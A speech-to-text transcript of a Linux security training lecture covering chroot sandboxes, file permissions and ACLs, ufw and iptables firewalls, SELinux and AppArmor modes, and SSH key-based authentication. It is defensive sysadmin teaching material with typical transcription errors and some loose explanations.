for creating an isolated environmental Linux essentially creating a Sandbox for yourself uh which enhances the security by restricting programs to a specific part of the file system and it’s commonly used for running potentially untrusted applications like we said um development and testing as well as system recovery so this is actually a very useful little strategy um that comes embedded within Linux and you can essentially turn any new directory that you’ve created into this little sandbox environment to protect the rest of your system from anything potentially that may go wrong or just if you wanted to test something so we don’t you don’t even necessarily need to worry about uh hacks or anything like that a lot of times you just want to test a new development uh or a new upgrade in the code or a new upgrade in the software so on and so forth and you just want to make sure it doesn’t affect the rest of the system and uh wipe something on the system or crash the system or accidentally delete data so on and so forth forth so it’s a very useful tool to create an isolated environment also known as a Sandbox type of an environment all right now we’re going to take another look at file permissions and ownership and this time we’re going to dive a little bit deeper into this particular concept so uh as you should already know there are different levels of file permissions that we can apply to something and there are different groups that can have ownership as well as access to uh any of the files or directories or anything that exist on a particular system the three different categories would be the owner which would be the user or any other user so it falls under the other category as well but there’s the particular owner which would which would technically be a user um there’s the group and then there are others and then the others would also considered to be users and they could also be considered to be the group that may have access to it so we have these three levels of ownership or access okay and then these three levels also have three levels of permissions which is the read permission the write permission and the execute permission and so if we remember the read permission has a numerical value of four the write permission has a numerical value of two and the execute permission has a numerical value of one so if you had all of these turned on you would have a value of seven right uh if you only have the read and write you only have a value of six if you have to read and execute you have a value of five so on and so forth so these are the permissions and then they can apply to any of these particular ownership categories okay so the first one that we want to think about in this case is just looking at the breakdown of what these things are again and then looking at what these particular breakdowns are again just to kind of give you an idea here the very first character which is represented by this Dash right here um if it is a dash it is a regular file if there’s a d right here instead of that Dash it means that this particular item is a directory and then an L would be a symbolic link so on and so forth so this particular uh item this very first character represents the type of the file that it actually is the next three characters represent the owner’s permission so in this particular case there’s a read write and execute permission that has been attached to this particular item and then the following three characters represent the group permission so it is read not write permissions but only execute and then this will be the other category which is read no write permission and execute so the group as well as the others category both get read no writing permissions and execute and writing represents modification or writing to the file so on and so forth so you can read the file or you can execute the file you can read the binary you can execute the binary so on and so forth but you won’t be able to write to it you won’t be able to modify it okay that’s what this particular example represents knowing this now we can look at what it uh means to change the permissions of something right how to change the permissions of something and we can do this with ch mod also known as change mode and in this particular example we’re doing it with the symbolic version so instead of using numerical values we’re actually using the symbols which is read write execute so on and so forth so in this case we’re looking at this particular example again what we’re doing is we’ve given the user read write and execute permission so you plus read write execute and then group plus read and execute and other plus read and execute and then the name of the file name usually this also requires a pseudo right in front of it so it would be pseudo chod yada y y and so we’ve given the user these permissions we’ve given the group these permissions and we’ve given the others category these permissions as well and then there’s the numerical value the numerical mode of changing permissions which happens with the actual numbers themselves and so the first number represents the user the second number represents the group and the third number represents the others category and as we already established the read write and execute permissions total seven and so in this case they only have read and execute so read would be four execute would be one which totals five and then read and execute would again total five in this particular case so this is what it looks like to change the permission numerically for that particular file name and this exactly is representing what we did in this previous case which was we were doing this whole Spiel right here so everything that you see here actually turns into 755 in this particular case now if we wanted to change the ownership of this particular file we would do it using the CH own Chone uh command and so you can see that they’ve used pseudo in this particular example and we’re doing CH own user and group and then for this file name and so what you would do is you would just replace these two Fields right here with the actual user and the actual group um that you would want to dedicate to this particular file name so it would be you know user one for the developers group and that would be uh for this particular file name so you change the ownership of the file to the specified user and group and you replace user with the username and group with the group name and then it would change the ownership of whatever this file is to those entities that we have declared and this is what that looks like so we’ve assigned it to Alice and the developers group and that would be the ownership for the example. text file in this case then we have changing of the group so you can change the group ownership and you would just do it with the chgrp change group uh command and you would first use the uh first assign the group itself that you wanted to be changed to so let’s say again developers and then you would give it the file name and again they’re using the suit pseudo command uh to allow the pseudo or administrator type of permissions to this particular command cuz you are again you’re changing the actual group of a particular file the ownership of that particular file so that should require an administrator’s privilege and this is what it looks like as the actual example right so we’re doing the example. text and we’re assigning the ownership of this particular file to the developers group using the change group command so here’s a sample workflow here so we have the file that’s been created so by using touch we created this file then we did change mode to change the permissions of it and so the owner has a permission of six which represents read and write and then everybody else has a permission of just read which is represented by the four and that’s pretty much it that’s the permission that we have over here and then if we do LSL for this particular file it should show us that it only has read write and then everybody else only has a read permission for that particular file if we wanted to change the ownership of that file we could just use the CH own command same exact file name and then it’s going to be I mean you just saw this in the CH own uh portion of the presentation anyway so this is literally a duplicate command that we just saw but we are assigning the owner uh to Alice so Alice would actually be the user and then the group ownership would belong to the developers group and it’s for the example. text and then again you just do LS and with the dasl option so you can see who the file ownership is and uh it’ll show you uh the First Column that right after the permissions it will show you the name of the owner and then the very next column would represent the name of the group and it would be Alice and developers in this particular example and in this example we’re changing the group which you’ve already seen this command already as well but we just wanted to kind of reaffirm this particular series of commands here so this this is how you change the group and then if you wanted to see who the new group was you would just do ls- L and it would show you that change so in summary understanding and managing file permissions is very important to system security because you don’t want people who should not have access control or should not have access to a specific fer directory to actually have access to that fer directory and to guarantee that to confirm that you have only assigned uh permissions for uh certain items s to certain people or certain groups you would do it with these various options so you would change the permission for everybody right according to what should be the permissions for it some people should not have any permissions right so you can remove the read write and execute permissions from every single person by doing a minus instead of a plus so in the previous example so if we go and look at just the particular example where we had the let me real quick quick skip to it in this particular example where we’re doing a the others group and we’re doing plus read and execute we could just as well do minus read and execute and it would remove the permissions for that same thing with the group we could do group minus read and execute and it would remove the permissions for that so just depending on what the instructions are and what you’ve been told to do cuz they’re going to tell you you know these groups of the company should not have access to these files or directories so need to remove permissions of anybody for this particular directory and all of its contents and when you assign when you bring in a new employee and they have access to a certain group and all of the assets that belong to that group this particular subcategory of those assets should not belong to these new employees unless they’ve hit a senior level secure uh a level of seniority excuse me and then when they hit that level of seniority then you can give them access until then they should not have access to it so you remove access to that specific category of files or folders by doing the owner or group or others and then just doing a minus command for that and then if you wanted to do it numerically then you would change these things to zeros and the zeros would represent no permission so it would be 70 meaning that the group as well as the others category have no permissions they can’t read they can’t write and they can’t execute that specific file so this is what’s important about the change owners ship and the change mode which means the permissions of it and of course the change Group which would change the group that owns that particular asset so this is a very very simple series of commands but they’re very powerful series of commands especially when it comes down to access control lists and making sure that people who should not have access to something don’t have access to those things and then whoever needs to have access to it actually can access whatever those assets are which brings us to access control lists so Access Control lists are a way to provide more more fine grained control over file and directory permissions uh other than the standard Unix file permissions that we just reviewed so with an ACL and access control list you can Define permissions for multiple users and groups in a single file or directory um or on a single fil in directory excuse me uh allowing for these specific access levels beyond the traditional group others and owner model so this is how we would go about doing it for first and foremost we need to have the entries of the access control list uh which means uh it’s basically a list type of a format and it’s uh each entry specifies the permissions for a single user or a single group um and it consists of the type which would be user or group The identifier which would be the user name or group name and then the permissions that are set for that which would be readwrite or execute so it I’m going to show you obviously examples of that um there’s going to be the user access control list the group Access Control list there’s a mask Access Control list and then there’s the default ACL so the user one specifies permissions for a specific user the group specifies permissions for a specific group a mask ACL defies the maximum effective permissions for users other than the owner and the groups so this is the maximum permissions that they have and everything beyond that they don’t have access to and a default ACL specifies the default permissions that are inherited by new files and directories created within a directory so anything that’s inside of a directory would essentially inherit the permissions of that directory uh so if the directory has a permission level of seven meaning you read write and execute essentially everything inside of that directory would inherit all of those permissions so it would also be rewrite and execute for everything that’s inside of that directory so the basic command here would be set f F ACL so set faac would set the ACL itself and in this particular case would be the mask for the user and then the read write and execute for the file name right so U represents user the user itself would be the actual name of the user and these are the permissions that are being assigned for that user um this is the actual breakdown of the command that we just saw so the M I’m sorry so the m is not mask the M actually stands for modify so my apologies for that um the explanation here is that we’re adding read write and exq permissions for these specific user on that file name and then we’re using the m to modify the ACL entries and then this is the actual uh string or the actual format of how to set permissions for that user which is in this case the user would be the the username so this could be user or this could be you this would be Alice and then these are the permissions that are being assigned to Alice now if you wanted to view the ACL for that specific file name you would do get fac so the first one was set faac this is get faac and then it displays the ACL entries for the specified file which in this case would be the file name showing all the users and groups within their uh with all of their defined permissions so whoever they are and the uh the level of permissions that they have on this particular file would be displayed by doing get fic the first one was again set fic and now we’re looking at the file name permission which would be get of ACL so this is the example workflow so we have pseudo because this does require administrator privileges and we’re setting the access control format for this particular file right here by modifying it and then it’s going to be for the user Alice and then she’s getting read write and execute permissions on this particular file so set faac modify for the user Alice readwrite and execute and of course the U is separated by a colon and then the the username and the permission levels are also separated by a colon and so pseudo F pseudo set ficm yada yada Y and this is how we add a user permission for a given file if we wanted to add a group permission it would exactly be the same entry so setf AC still going to be modified don’t only thing that we’re changing is instead of U we’re doing G for group and then we’re going to assign the name of the group which is developers and then they all will have a read and execute permission so they can’t write to the file or modify the file but they can read the file they can execute the file and that would be the example txt file again so this is how we set permissions for a group in this particular case and then we have the Set faac uh for directories right so this is the actual directory and in order to do that we need to assign the D flag or the D option in this particular case to designate that we are modifying uh the access control list for a directory so pseudo set f-d to designate that this is a directory DM to modify and then again for the same user and now we’re giving the path to the directory instead of the name of the file and then we’re going to view it so if you wanted to just view the uh the access controlers permissions for all of the groups and user users that have been assigned to this particular group you just or for this particular file excuse me you just do get faac and then the name of the file very very simple and then if you wanted to view the current example and then we can view the access control list for this particular file so we would do get fic and it gives us the access control list of the groups and the users and whatever permissions they have on this particular file and this is what the example output for that command would be so so the name of the file would be example txt the owner itself would be root the group would be root and then this particular user has this permission and then this particular user has readwrite and execute permission and then the group has this permission the group developers has read and execute the mask itself would be readwrite and execute and the other group or everybody that falls into the other category only has read permissions on this particular file right here to remove ACL entries would be done with the X option so it’s still a set FC command but now you’re doing the X option to remove uh the particular user from this particular file right so you don’t have to worry about the permissions or anything like that because you’re literally removing that entire user from the access control list on this particular file so whatever permissions they had is all being removed because we’re just removing the actual user from the particular files Access Control list to remove all of the access control entries for any given file it would be done with the dasb option and again it’s still a set f-b and then the name of the file itself if this was a directory we would do dasd to designate that it’s a directory then we would do DB to designate that we want to remove all of the entries and then we would give the name of the directory but it’s still a set fac command that is going to remove all of those directory uh entries or the a ACL entries excuse me so DX would be for a singular person for a single removal so it could be a group as well so you could technically do-x and then do G right here and then the name of the group so developers let’s say so we do G for group and then the name of the group developers and then we would give the name name of the file but we would do with a-x to just remove a singular entry if we wanted to clear the entire set of entries if we wanted to remove everybody from the access control list we would do a-b command and then we would just give the name of the file if it’s a directory you would do d d as well as DB and then you would do the path for the directory and then it removes every single entry for the access control list on that particular asset to modify the mask you would also use the set faac in this particular case and then we are using the- M to modify but what we’re doing in this case we’re modifying The Mask which is rewrite execute for this particular file and what that does is that anybody so anybody any user and group specified by this Access Control list for this particular file they all have rewrite and execute permission so even if you did user Alice and read if the mask itself is read write and execute then Alice would actually get read write execute permissions on this particular file and then if the developers group is in here and they only have read as a permission if you do readwrite and execute for the mask then it would allow it that they would be able to read write and execute for everybody that’s inside of the developers group on this particular file so in summary the access control list is an advanced method for managing file permissions in Linux allowing specific access levels for multiple users and groups the commands set fic and get fic enable you to set and view these fine grain permissions easily and then you already know the various options that we have so if you do you know dasm you’re modifying the permissions and that goes with set fic if you do-x you’re removing a singular person or singular entity from the list if you do- D you’re designating that it’s a directory and if you do dashb as in boy you’re removing every single person and every single entity from that access control list and then you would modify them you know specifically if you wanted to add a user you would have to have the U in front of the username if you want to add a group you would have the G in front of the username so on and so forth so I’m not going to repeat all of that stuff because you could just re rewind it and just go watch all of that Al together but uh set fic and get fic are the commands that we would use to uh set the access control list for any given asset and see the access control list for that asset all right now we need to talk about network security which is also very very important concept under the security umbrella and the very first portion of it would be the management of the firewall we’ve already done an intro to ufw which is the uncomplicate ated firewall as well as IP tables but we’re just going to review these things a little bit more so you should already know that firewalls are very important in network security they act as a barrier between your internal and external networks um and they monitor and control incoming and outgoing traffic and these are done with rules that we establish so uh both ufw and IP tables have sets of rules that you can use to ensure that whatever you’re trying to do uh gets done right so uh the first thing that we’re going to talk about is the ufw the uncomplicated firewall the uncomplicated firewall is a very simple firewall but it’s a very powerful firewall it doesn’t have require uh it doesn’t require like very complicated uh commands or understanding a variety of different sophisticated binaries uh to be able to run it it has easy syntax and it’s powerful it actually does what it needs to do right it gets the job done essentially um to first run it to actually activate it you need to run pseudo ufw enable and essentially everything else that we do is going to require a pseudo command to preface the rest of the commands so first you need to enable the firewall you need to actually activate the firewall the next thing you want to allow or deny traffic now to be able to allow traffic uh in this particular case what we’re doing is we’re in the First Command uh this Command right here is allowing incoming traffic on Port 22 which is SSH right this particular Comm and you have to if you want to do outgoing traffic as well if you want to allow outgoing traffic on SSH you would need to also say pseudo ufw allow outgoing excuse the capital S right here it’s a lowercase s for pseudo so anything that you want to uh set up as a rule that would be outgoing outbound traffic you need to put the keyword out in it so this particular command at the very top this first command is only dealing with incoming traffic so it’s allowing incoming Port 22 traffic same thing with this command it’s allowing or it’s denying incoming Port 80 traffic in this particular case we would be denying outgoing particular uh uh HTTP traffic on Port 80 right so uh pseudo ufw deny outport 80 traffic would be denying outgoing outbound HTTP traffic on Port 80 if you want to check the status of what’s going on with all of the rules that you have have that would be done with the ufw status command so it will show you whether or not the firewall is actually active and then what all of the active rules are that are running on the ufw firewall this is a new command that we’re going through which is uh allowing traffic from specific IP addresses right so you can say ufw allow from this IP address to any port on Port to any port 2022 I keep saying 2022 I don’t know why I keep doing that but it would allow anything from this particular IP address to any port 22 so it allows SSA traffic from this IP address on Port 22 um you can do a deny that would be on Port 22 as long as you have this allow from this IP address now you’ve whitelisted this particular IP address and even though everybody else could be denied on Port 22 this particular IP address will be allowed to come in and again this is inbound right cuz we haven’t done allow out we’re only doing allow which means that it’s inbound traffic incoming traffic and it’s coming from this particular IP address on Port 22 so this is how you allow a specific IP address IP tables would be the more complex or we can call it the sophisticated it would be the sophisticated counterpart of ufw um it allows more detailed control over the network it allows ad administrators to create complex rules for packet filtering Network address translation which essentially means that it masks your IP address so that people from the outside can’t see your actual IP address so when you send out traffic from your network it’s uh it’s masked essentially um by a different IP address and that IP address would be what the outbound or the outside world would see which is a very very powerful tool actually and then you know there’s mang and so on and so forth so it’s very very useful but it does require that you have a better understanding of networking Concepts the very first thing would be to just learn and see what your current rules are so you can just do pseudo IP tables DL with a capital l and it will show you all of the current rules for your filter table so this is the other thing right so you have a variety of tables that exist inside of Ip tables so in this particular cas case without designating what table we want to look at the default will be the filter table so it’ll show you the input forward and output chains for the filter table if we wanted to add a rule to our table uh we would do it with the a so capital A which would be either append or add however you want to remember it but it would be a capital A and we’re doing it to the input table and notice that the input uh table is also in all caps so you’re doing capital A input and then the protocol would be TCP so this is TCP traffic that we’re allowing to happen and then we’re doing on the destination Port 22 and then we want to do an accept for it so the J I believe is Jump I think that’s what it stands for um and what we’re doing is accepting the traffic on destination Port 22 and this is for input traffic which represents incoming traffic that’s coming in on our input table or input chain excuse me on the input chain on our particular table so we’re doing adding on the input chain on the protocol TCP destination Port 22 and we want it to be accepted if you want to block traffic again you’re adding it to the input chain protocol would still be TCP and the destination port in this case would be 80 and then what you want to do is you want to drop the traffic so there’s no it’s not deny if you want to block something you’re dropping the traffic so the previous one was accept this one is drop if you want to save the rule that you just created the IP tables rules uh you would do it with the iptables-save command and then you need to add it to the configuration file which is a rules. V4 config file that is inside of the Etsy IP tables directory so inside of once you have IP tables installed inside of the IP tables directory inside of the ETS directory there’s going to be a file called rules V4 and these are all of the rules that will persist right so when you restart the computer the all of the rules that you just created will also be saved so that the next time the computer reboots all those rules are still active um if you want to restore rules you would do restore and then notice the arrow right so in this particular case we have this forward slash which uh I guess is the greater than sign so we are saving the rules that we just created forward uh forward sign and then it’s going to go inside of the rules V before if you want to restore it when you use the restore command you’re using the less than symbol and then you’re going to use the same path which is going to come from the the rules. V4 file and it’s restoring the rules from a saved file uh just in case you whatever reason for whatever reason you need to restore your rules if somebody changed your rules or if you changed your rules and you want to go back to your previous rule set that You’ saved you would pull all of those rules from your rules. V4 file by doing the restore command in summary we have the simplified management with ufw uncomplicated firewall and then we have the IP tables which is Advanced control for detailed Network traffic management you have the network address translator you also you also have the mangles and all that stuff which we covered in the first description of the IP tables and the ufw but we needed to talk about firewall management because we are talking about network security under the security chapter so it was very important to re-review these files or re-review these tools um but we are going to actually use them when we get to the Practical section of this training series anyway so we’re going to run a bunch of commands and we’re going to create a bunch of rules and do a lot of things that will be relevant to your labs and uh ultimately your skill set as a Linux administrator when you want want to manage and you want to configure firewall rules for either ufw or IP tables another really important tool for security is actually SE Linux so security enhanced Linux um I’m just going to call it selinux uh selinux probably I don’t know if it’s selinux SE Linux I kind of like selinux cuz it it removes one syllable so selinux is a security module in the kernel that provides a mechanism for supporting Access Control policies includ including Mac Mac addresses um it’s commonly used in the red hat based distributions like Fedora Centos and red hat Enterprise Linux and the key concept here is that there are policies right so we have policy-based security um and the policies inside of selenex uh Define the rules for which processes and users can access which resources so these policies are strictly enforced providing an additional layer of security Beyond traditional discretionary access control which is also known as DAC so these are an additional layer of security and the they are very strict right so these are strict enforcement to set the rules for which processes and users can access which resources um the modes of operation are to enforce to permit or to disable so you have the enforcing mode you have the permissive mode and you have the disabled mode selinix policy is enforced and access violations are blocked so this is what enforcing is permissive is that the policies are not enforced but violations are logged for auditing purposes and then there’s the disabled which is it’s just turned off and it’s not working so you actually have the enforcing rules that anything that violates the policy is being blocked you have the permissive which is still logging everything but it’s not blocking the actions right so if there are malicious actions they’re not being blocked but everything is being logged so that it can be audited later on and then you have the disabled version of this so our very first basic command would be to see the status of what’s going on so the to be able to uh view the status of selenic including what mode it’s running under and all of the loaded policies or whatever the policy is that’s loaded you just do SE status so selenex status right SE status and then you would be able to see the current status as well as the policy that’s being enforced if you want to set the policy to enforcing mode in this particular case what we’re going to do is do set in force right so set in force and then one I believe represents true so zero would represent false one would represent true and in this particular case we’re saying that we want the enforce policy to actually be activated so we do set in force one and it changes the cenx mode to enforcing and this command ensures that all cink policies are strictly in forced if you do set in force zero it goes into permissive modes yeah so I I was actually uh misguided or misinformed I Mis assumed um the set Linux to permissive mode goes into set en force zero which changes it to permissive allowing violations to be logged so one represents the enforcing mode to actually be active and it is enforcing all of the rules and zero represents permissive mode so that it logs everything but uh it doesn’t block anything it doesn’t enforce anything of the rules or policies that may uh be in place and then we have checking the status as we’ve already established and then we have the Practical example or the the rule set to just kind of re remind us of how to set enforcing mode which is in this case set enforce one and then if you wanted to set the enforce to zero you would be putting it in permissive mode and this is essentially what the selenic Practical examples would be in this particular case uh we are going to go into the Practical commands when we actually get into the Practical section of this training of this training Series so that you can learn how to use this particular tool in depth another useful tool is app armor so app armor uh also known as application armor is another Mac system that provides and Mac we’re talking about Mac not Mac as in uh Apple so it’s another Mac system um that provides an additional layer of security by conf finding programs according to a set of profiles it’s commonly used in De based distributions like Ubuntu which is what C Linux runs on and so on and so forth so anything that essentially runs on davan or Ubuntu um is what app armor uses because it deals with applications specifically um the key concept is that there’s profiles in this particular case so previously we had policies which was in sellx now we have profiles inside of app armor and the profiles Define the access permissions for individual applications they specify which files and capabilities an application can actually access preventing it from performing unauthorized action so think about this as when you try to turn something on inside of your windows or inside of your um Mac OS and there’s a little popup that comes up and it says you know do you want to allow Google Chrome to access your microphone for example and this would be something that’s specific to the Google Chrome application and then it’s now giving uh your you’re giving that specific application access to the microphone or your downloads folder right so if you want to if you download something and it deals with the files inside of your file system uh once you try to run that application there’s going to be a popup that shows up from Mac OS or from Windows that says hey do you want to give this particular application access to your documents folder or your downloads folder or your pictures or so on and so forth it starts asking for permission to navigate across your computer and so this is what app armor is similar to and because of the fact that you have applications that are downloaded on an obuntu based distribution um then you are now dealing with the actual app itself and the app needs to be given permission to do a variety of tasks across your machine so we have the learning and enforcing modes in this particular case so enforce profile is uh authorized to access attempts and uh unauthorized access attempts are blocked excuse me so the app armor profile is enforced and unauthorized access attempts are blocked and then complain would be that unauthorized access attempts are allowed but they’re logged for review so this is similar to the enforce and the passive or permissive I think it was um it’s very similar to those particular profiles that were inside of sellic they’re just named differently so in this case we have enforce that it enforces the rule and any unauthorized access is blocked and then you have complain that uh allows the attempt but it just logs it for review uh the basic command to check the status would be pseudo AA standing for app armor Das status and it displays the current status of app armor including which profiles are loaded and their enforcement mode and then you have setting the app armor to enforcing mode for any given profile so in this particular case you would do AA enforce and then you give it the path to and it’s a it’s a fairly lengthy path but it is the path to uh the specific application that is going to be uh enforced for whatever the rules are so the profile for a specific application to enforcing mode ensuring that the rules are strictly applied to whatever the name of this application is going to be and then you will need to get the name of the application as it is inside of the user binaries uh and it’s very different from what you would see uh for Google Chrome for example which is a capital G Google and then there’s a space and a Capital C Chrome it’s rarely like that it’s typically all one word it’s typically all lowercase so you need to find the name of the application as it stands inside of your binaries or your optionals or wherever that application is actually installed and whatever that path would be to that application and then you would enforce the app armor rules upon it you would enforce the app armor enforcing mode for any given profile if you wanted to set the policy or the profile to complain then you just do AA complain and then you just give it the the path of the application very similar to the previous one the only thing that’s changed in this case has been aa- complain instead of aa- enforce as we saw over here and that is how we designate the complain mode for that specific application just a couple of practical examples here so again you can just do AA status to get the status of app armor you can do AA enforce to enforce a profile for a specific rule or for a specific application so in this case it’s Firefox right so Etsy apppp armour. D user. bin. Firefox and this is the specific application that is now enforced whatever the rules are they’re being enforced upon Firefox in summary we have both selinux and app armor that are robust security mechanisms for l systems through mandatory Access Control policies that’s what Mac Mac stands for so you have discretionary access control which was DAC and then you have mandatory access control which is mac and while selenex is typically used in Red Hats distributions app armor is used in deas distributions and emphasizes application specific profiles uh selenic focuses on systemwide policies across the entire system app armor is honed in on specific applications and they’re both very very useful and they do deal with mandatory Access Control policies which are also very very useful so Mac mandatory access control and that’s really what it means right so it’s like when when you go through coma cyssa plus which is uh an examination that I had the privilege of taking they give you a lot of situations they give you like a breakdown of okay this is mandatory access control and this is what it applies to and so on and so forth but you don’t really get it until you actually go through some tools that enforce those things and you’re like oh okay so when I enforce uh you know Firefox to not have access to my microphone for example that is technically a mandatory Access Control policy that mandates that that specific application cannot access my microphone and then until if I wanted to access my microphone for a zoom call or something like that or for a Microsoft teams come Zoom is actually its own application so Microsoft teams or whatever or let’s say dis uh what is it called Discord uh you can also have voice conversations on Discord so if you want Firefox to actually finally get access to your microphone when you do those voice calls then you do need to go and give it that permission inside of app armor for example if you’re running Linux right so this is very important to understand that this is actually where the rubber meets the road and these specific concepts of Mac there that’s how you enforce them by using something like app armor which it it could be as simple as a popup that shows up on your screen that says hey do you want to give this application permission to do this right it could be that or you can actually be going inside of your settings or go and inside of your terminal and use the the enforce policy or the enforce profile for app armor against the Firefox tool itself so um this is the difference between app armor and selinux all right now we’re going to switch gears a little bit and we’re going to go into user authentication and configuring secure shell which kind of actually do go hand inand so first and foremost let’s talk about user authentication methods um there’s password-based authentication which is the default mode for authenticating any given user everybody gets a password and you have to enter your password correctly to authenticate yourself to prove that you are who you say you are now the users are given a username and they’re given a password to gain access to a system to gain access to an application this is not news so if you don’t know if you don’t know this and you’re watching this tutorial you’re in trouble right so it’s like to understand that there is a username and a password for everything in this world anything and everything has a username and password YouTube that you’re watching this on most likely you have user uh profile with Google that’s connected to your YouTube account and you provided your user uh Gmail as well as your password if you’re watching Netflix you get a username and password if you want to access your phone there is a pass phrase or a PIN number that you have to enter to access your phone and then when you do your face scan or your fingerprint that is still authentication but now it’s going into Biometrics which I’m kind of getting ahead of myself but essentially you’re authenticating yourself in a variety of different ways and the very first one the most basic one is passwords so you get a password-based authentication password-based authentication uh improves the security of any type of an environment and to be able to improve the security of the password you do something like multiactor authentication which is also known as MFA and that could be something like a code that’s been sent to your phone or your uh Gmail account your email account they send you a secret code a onetime code and then you enter that and you can access the system the fingerprint scan is a version of the biometric that we were talking about that helps you multiactor authenticate yourself to be able to get access to that system and these things are done in addition to the password so if you’re accessing your bank account on a new computer or on a new browser or you’ve it’s the same exact browser or same computer but you reset the computer like right you you reformatted the computer and so all of your cachets are wiped or you just wiped your browsing history from chrome and your caches and your cookies are no longer saved when you do something like that it says oh you’re logging in from a new browser we’re going to send you a one-time code in addition to the password right so you enter your email and password you log in and it says okay we’re going to send you a onetime code and then when that happens now then they ask you do you want to save this particular browser for future references and then that’s how you develop new cookies and new cachets right so this is the whole process of multiactor authentication and it enhances the password authentication and it’s a very useful way to reduce the risk of unauthorized access because sometimes somebody may get access to your password but if you get text a code saying hey enter this in your login most likely that person won’t have access to your phone number or your email hopefully I mean it’s scary to think about but it it is possible for people to get access to your email and even your phone it’s just not as easy as somebody running a dictionary attack and finding out your password if you have a really weak password so um yeah again I’m getting I’m going off on tangents and I’m getting ahead of myself but uh we can enhance password based authentication by using something called multiactor authentication which is very simple and you just send a a code to somebody that’s one of the most useful ones and it’s very very useful the next level up would be a public key authentication and it’s more secure than password because it involves the use of a key pair so a private key and a public key the private key remains within the user or with the user while the public key is placed on the server and this goes into the realm of symetric and asymmetric uh encryption that happens typically with transactions that are done with your browser so uh a transaction is you viewing something on your browser but there is the private key and the public key that is available from that website so the private key is something that you can’t see from the certificate authority of that website that they have to authenticate themselves and there’s the public key that is given to you the viewer so that you can verify yourself and you can go back and forth interacting with the conversations or the interaction the transactions within that specific uh browser within that specific website right so you have a public key Authentication that just supersedes it it is uh it’s an amplified version of the password-based authentication um it had enhances your security so it is no longer a uh subject of Brute Force attacks because you can’t brute force a key right and the the private and the private key or private and the public key excuse me um it doesn’t require the transmission of passwords over the network because you’re just dealing with those keys it allows for automated passwordless logins which are particular particularly useful for scripts and applications and this does include at least a one-time login though because there is that initial U authentication that needs to take place with that uh password but then you just you automate the rest of that process because you now have a public and private key so to speak that uh communicates with that website or that application so that you no longer need to do a a password entry and this is how when it remembers you when a browser remembers who you are and you don’t need to provide that password anymore the next time that you log on to Facebook it just logs you in right the next time that you log on to Gmail even if you’ve closed the tab even if you’ve closed your browser the next time that you log on then it’ll actually just log you back in without asking for your password because the key is in place um if you wanted to generate a key you would do it with s SSH key gen and this is a little bit complicated of a process so we’re not going to go too deep into to this uh we will when we get it to the Practical section of this training series and we start doing these things um later on but uh you do SSH key gen and it actually generates a new key pair and you’ll be prompted to enter a file to save the key2 which is typically the SSH ID RSA and then optionally you can set a passphrase for an additional layer of security on that actual key right so if somebody wanted to access that specific key file they would need to enter the password to be able to access that key file so now you have multiple layers of security and so you create a key using SSH key gen and you can even uh designate the algorithm the hashing algorithm of the key that you want to generate so do you want to Shaw one sh1 do you want to sha 256 so on and so forth right so you can designate the hashing algorithm that you want to be used when you’re creating this SSH ID RSA by default it does a Shaw 256 key which is a very very pass uh powerful hashing algorithm this is what the output looks like so when you actually run that SSH key gen this is what the screen will look like so these are individual commands that show up right so first it says is generating it enter the file uh that you want to save the key to and then you would say such and such and then you press enter and then you say it says enter the pass phrase so if you don’t want a pass phrase you just press enter and it moves on but I do recommend you actually have a pass phrase for your key and then you verify your pass phrase again and then it’s been saved and then it’s been saved and then the key fingerprint is a shot 256 as you can see right here as well as the username uh and the host and it’s like a long series of characters that comes in after this particular portion right here and it seems like jargon and I mean for the most part it is uh it’s like you you can’t make out what it is because it it very much looks like a code like a long piece of encryption code so you you can’t make sense of it with a naked eye you need to feed it into something at the very least to try to use some other type of decryptor to be able to get access or decoder I should say you should you need to use a separate tool to try to make sense of what you just found but for the most part you can’t because it’s not designed uh to be able to be decoded or decrypted without its actual key right so whatever is generated nobody can make any sense of it unless they have the key they can’t unlock the lock unless they have that key which is why this concept is so powerful now that we’ve generated the key now we want to copy that key to the actual server so you would do SSH copy ID and then the user at whatever the server is and this copies the public key to the server placing it inside of the authorized keys of the SSH directory um for the specified user and this step allows the server to authenticate the user based on the public key copy the public key to the actual server if the SSH copy ID is not available you can manually copy the public Key by going and finding where it is so this is the actual key location right so where we when we went over here it said that it was saved inside of the home user and then this is a hidden uh directory and we’ll we’ll look at this when we go into the Practical section when you’re looking for a hidden file so if I did a regular LS command without looking at the hidden files this would not show up so this is a hidden directory and then inside of the users home folder um the hidden directory includes this ID RSA file so this is actually being saved inside of the home folder of the user and so if you can’t do it uh autom automatically using the SSH copy ID you can do it manually by going through these various series of commands right here so we can see that we’re going to concatenate this specific key and then we’re going to pipe so this is what this pipe is and we’ll talk about this again when we get into the Practical section but what we do is that we take the output of this command so cat as you should already know will display the contents of this file but when you take the output of this which is displaying the contents and you pipe it into this command which is using the SSH uh binary to log into this specific user and then make the directory of this specific directory right here and then concatenate that so you should already know what these double ends represent right so we’re combining a series of commands here so we’re going to do SSH user server we’re going to make a direct Dory for this specific directory inside of the root and then we’re going to concatenate that into the authorized keys so it’s a series of commands first we read this we take the contents of this and we pipe it into the SSH command that goes and creates a new directory and concatenates the contents of that inside of the SSH authorized keys this you don’t need to memorize you don’t need to know what all of this represents right now I’m just showing you what a manual version of this looks like so you kind of get exposed to it so that as we review it later at least it was embedded in your head at some point and then it’ll make it’ll it’ll be easier to make sense of it when we go into the later portions of this so you don’t need to memorize this you don’t need to know this off top of your head right now you should know what this is right you should know what this specific piece represents oh this is a key file for uh SSH where we’ve generated an RSA key file and it looks like that they’re adding it to the author authorized Keys uh list of authorized keys for this particular user right so you don’t need to know all the details but you do need to recognize these specific points so that you can see what is potentially going on right as long as you can make sense of it you don’t need to know the exact details of everything that’s going on that’s that’s the main point that I’m trying to show you here once the key has been copied into the authorization Keys the authorized Keys then you can actually SSH into that that server with that user and this is a very basic SSH command so you’re just secure shelling as this user into this particular server that’s all you’re doing um once you set it up and copy the public key you can log in without being prompted for password that’s the whole idea here um again this whole piece requires some kind of authentication at some point because you can’t just add a key to the authorized Keys folder without being authenticated at some point this is assuming that you’ve authenticated yourself with a password at some point in this process before you started this process and now the system trusts you therefore it’s allowing you to transfer this key to that authorized keys and once you’ve done that then you can access the server without entering your password if you have never entered your password and you’re trying to access the server as this user it is going to ask you for a password I don’t care I don’t care how uh great you’ve done the rest of the stuff that we just talked about if you never authenticated yourself none of those things are going to work therefore at this point you’re going to be asked for a password so the summary here is that you can have a password-based authentication which is the default mode of verifying who you are with any kind of a system but then you can have multiactor that enhances that password-based authentication something like sending you a onetime code or your fingerprint or your face scan something like that and then you have the public key key authentication which is a stronger security for using key paare it still requires at some point you’ve entered a password to verify who you are so that you can generate a key pair and then transfer the key pair 